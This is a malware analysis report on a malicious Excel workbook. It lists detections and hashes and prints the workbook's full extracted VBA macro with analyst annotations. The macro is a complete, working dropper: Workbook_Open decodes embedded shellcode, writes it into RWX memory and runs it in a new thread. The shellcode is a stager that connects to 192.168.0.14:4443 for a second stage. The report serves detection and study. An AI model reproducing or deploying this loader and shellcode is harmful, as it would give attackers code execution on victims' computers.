Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 74c99deb297f686f…

MALICIOUS

Office (OOXML)

15.2 KB Created: 2014-04-27 16:42:18 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2015-09-19
MD5: 5a35dda215b89318f7d54b4791c56940 SHA-1: 15a32f22477a633b4bb54c6ed22f332d864f3fbe SHA-256: 74c99deb297f686f539cd393bb20a12c6a6b678ca1887092a4c59e507d33f16e
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The critical-severity ClamAV detection identifies this file as a known malicious dropper. The VBA project contains a Workbook_Open macro, which Excel runs automatically when the workbook is opened with macros enabled, and that macro calls the Windows API functions VirtualAlloc, WriteProcessMemory, and CreateThread — a sequence that allocates memory, writes shellcode into it, and then executes it in the host process. This is a common technique for downloading and running a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Dropper.Agent-6388495-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6388495-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5219 bytes
SHA-256: 2afbbb5f6250f779b1ce8788afa50ffe5352cef6ee12ab32de605fb907a73e1d
Preview script
First 1,000 lines of the extracted script
' ThisWorkbook: the document-level module. Of the four modules in this VBA
' project it is the only one that contains procedures; the Workbook_Open
' event handler further down is the auto-execution entry point.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' --- Win32 imports used by the loader (analyst annotations) ---
' The VBA7 branch (VBA7 shipped with Office 2010) uses PtrSafe declares with
' LongPtr for pointer-sized values; the #Else branch is the legacy form.
' Both branches import the same three KERNEL32 exports, which together form the
' classic allocate / write / execute in-process shellcode pattern that
' Workbook_Open below drives.
#If VBA7 Then
' Allocates memory in the calling process. Workbook_Open passes MEM_COMMIT and
' PAGE_EXECUTE_READWRITE (constants below), i.e. the region is RWX.
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
' Copies lpBuffer into hProcess at lpAddress. Workbook_Open passes hProcess = -1,
' the current-process pseudo-handle, so this is self-injection rather than
' injection into another process.
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As LongPtr, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
' Starts a thread whose start address is the buffer filled by WriteProcessMemory.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As LongPtr
#Else
' Legacy (pre-VBA7) declares: identical imports, all handles/pointers as Long.
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long
#End If

' Flags passed to VirtualAlloc by Workbook_Open: MEM_COMMIT (0x1000) and
' PAGE_EXECUTE_READWRITE (0x40). A private RWX allocation made from an Office
' process is a strong detection signal on its own (e.g. memory-scan / ETW
' allocation telemetry), independent of the payload bytes.
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40

' Auto-execution entry point: Excel runs Workbook_Open when the workbook is
' opened and macros are enabled (this is the line the OLE_VBA_WBOPEN heuristic
' matched). Flow: decode the payload string -> VirtualAlloc an RWX buffer of
' that length -> WriteProcessMemory it into the current process (-1 pseudo-
' handle) -> CreateThread at the start of the buffer. The API return values
' are assigned to lResult but never checked, so a failed allocation or write
' is not handled; no error handler (On Error) is installed either.
Private Sub Workbook_Open()
    #If VBA7 Then
    Dim lpMemory As LongPtr
    Dim lResult As LongPtr
    #Else
    Dim lpMemory As Long
    Dim lResult As Long
    #End If
    Dim sShellCode As String

    ' Payload assembled by ShellCode() -> ShellCode1() -> ParseBytes().
    sShellCode = ShellCode()
    ' lpAddress = 0 lets the OS pick the address; size = decoded string length.
    lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    ' -1& is the GetCurrentProcess() pseudo-handle: the write targets the
    ' host (Office) process itself, not a remote one.
    lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
    ' Thread start address = the buffer just written; payload execution begins here.
    lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub

' Decodes a space-separated list of decimal byte values (e.g. "252 232 137")
' into a String of the corresponding characters, one Chr() per token.
' This is the project's only obfuscation layer: the payload is stored as
' decimal text so no raw shellcode bytes appear in the module, and the decoded
' string is what Workbook_Open writes to memory.
'   strBytes : untyped (Variant); expected to hold decimal tokens separated by
'              spaces (Split's default delimiter). No validation is done, so a
'              non-numeric token or a value outside Chr()'s range raises a
'              runtime error.
'   returns  : the concatenated decoded characters as a String.
' NOTE(review): Chr() and ByVal String marshalling are code-page dependent for
' values > 127, so when reconstructing the buffer for analysis, derive the bytes
' from the decimal values directly rather than from the decoded VBA string.
Private Function ParseBytes(strBytes) As String
    Dim aNumbers
    Dim sShellCode As String
    Dim iIter

    sShellCode = ""
    ' Split on whitespace into a Variant array of decimal tokens.
    aNumbers = Split(strBytes)
    For iIter = LBound(aNumbers) To UBound(aNumbers)
        ' Each token is implicitly coerced to a number by Chr().
        sShellCode = sShellCode + Chr(aNumbers(iIter))
    Next

    ParseBytes = sShellCode
End Function

' Payload container: the shellcode stored as twelve decimal-text chunks, each
' decoded by ParseBytes and concatenated. The report assesses this as a stager
' that fetches a second stage; the annotations below are observations on the
' visible bytes and should be confirmed by disassembly before being used as
' indicators.
'   returns : the full decoded payload as a String.
Private Function ShellCode1() As String
    Dim sShellCode As String

    sShellCode = ""
    ' NOTE(review): the leading bytes 252 232 137 0 0 0 96 137 229 49 210 100 139 82 48
    ' look like the x86 "cld / call / pushad / mov ebp,esp / xor edx,edx /
    ' mov edx,fs:[edx+0x30]" PEB-walk, API-hashing prologue common to
    ' Metasploit-style stagers — confirm by disassembly.
    sShellCode = sShellCode + ParseBytes("252 232 137 0 0 0 96 137 229 49 210 100 139 82 48 139 82 12 139 82 20 139 114 40 15")
    sShellCode = sShellCode + ParseBytes("183 74 38 49 255 49 192 172 60 97 124 2 44 32 193 207 13 1 199 226 240 82 87 139 82")
    sShellCode = sShellCode + ParseBytes("16 139 66 60 1 208 139 64 120 133 192 116 74 1 208 80 139 72 24 139 88 32 1 211 227")
    sShellCode = sShellCode + ParseBytes("60 73 139 52 139 1 214 49 255 49 192 172 193 207 13 1 199 56 224 117 244 3 125 248")
    sShellCode = sShellCode + ParseBytes("59 125 36 117 226 88 139 88 36 1 211 102 139 12 75 139 88 28 1 211 139 4 139 1 208")
    ' The bytes "104 51 50 0 0 104 119 115 50 95" at the end of this chunk and
    ' the start of the next decode (ASCII) to "32\0\0" and "ws2_", i.e. the
    ' string "ws2_32" — the Winsock library name, consistent with the report's
    ' assessment that the payload performs network activity.
    sShellCode = sShellCode + ParseBytes("137 68 36 36 91 91 97 89 90 81 255 224 88 95 90 139 18 235 134 93 104 51 50 0 0 104")
    sShellCode = sShellCode + ParseBytes("119 115 50 95 84 104 76 119 38 7 255 213 184 144 1 0 0 41 196 84 80 104 41 128 107")
    ' NOTE(review): "104 192 168 0 14" (spanning this chunk and the next) and
    ' "104 2 0 17 91" resemble push-imm32 instructions building a sockaddr_in:
    ' a dotted-quad 192.168.0.14 (an RFC 1918 address, so likely a lab/test
    ' sample) and AF_INET with a network-byte-order port (0x115B = 4443).
    ' Treat as a candidate C2 address only after confirming by disassembly.
    sShellCode = sShellCode + ParseBytes("0 255 213 80 80 80 80 64 80 64 80 104 234 15 223 224 255 213 151 106 5 104 192 168")
    sShellCode = sShellCode + ParseBytes("0 14 104 2 0 17 91 137 230 106 16 86 87 104 153 165 116 97 255 213 133 192 116 12")
    sShellCode = sShellCode + ParseBytes("255 78 8 117 236 104 240 181 162 86 255 213 106 0 106 4 86 87 104 2 217 200 95 255")
    sShellCode = sShellCode + ParseBytes("213 139 54 106 64 104 0 16 0 0 86 106 0 104 88 164 83 229 255 213 147 83 106 0 86")
    sShellCode = sShellCode + ParseBytes("83 87 104 2 217 200 95 255 213 1 195 41 198 133 246 117 236 195")

    ShellCode1 = sShellCode
End Function

' Thin wrapper that returns ShellCode1() unchanged. The empty-string init and
' single concatenation add nothing; the shape suggests a generator template
' that can stitch several ShellCodeN() parts together, with only one part
' emitted in this sample.
'   returns : the payload String produced by ShellCode1().
Private Function ShellCode() As String
    Dim sShellCode As String

    sShellCode = ""
    sShellCode = sShellCode + ShellCode1()

    ShellCode = sShellCode
End Function

' Sheet1..Sheet3: worksheet modules consisting of attribute headers only, with
' no procedures. All executable code in this project lives in ThisWorkbook
' above, so detection logic can focus on that module.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 18432 bytes
SHA-256: b09a5840d5538471399d393cf6c2b03a8cefcb944e6a2311b204a54383ca5d9f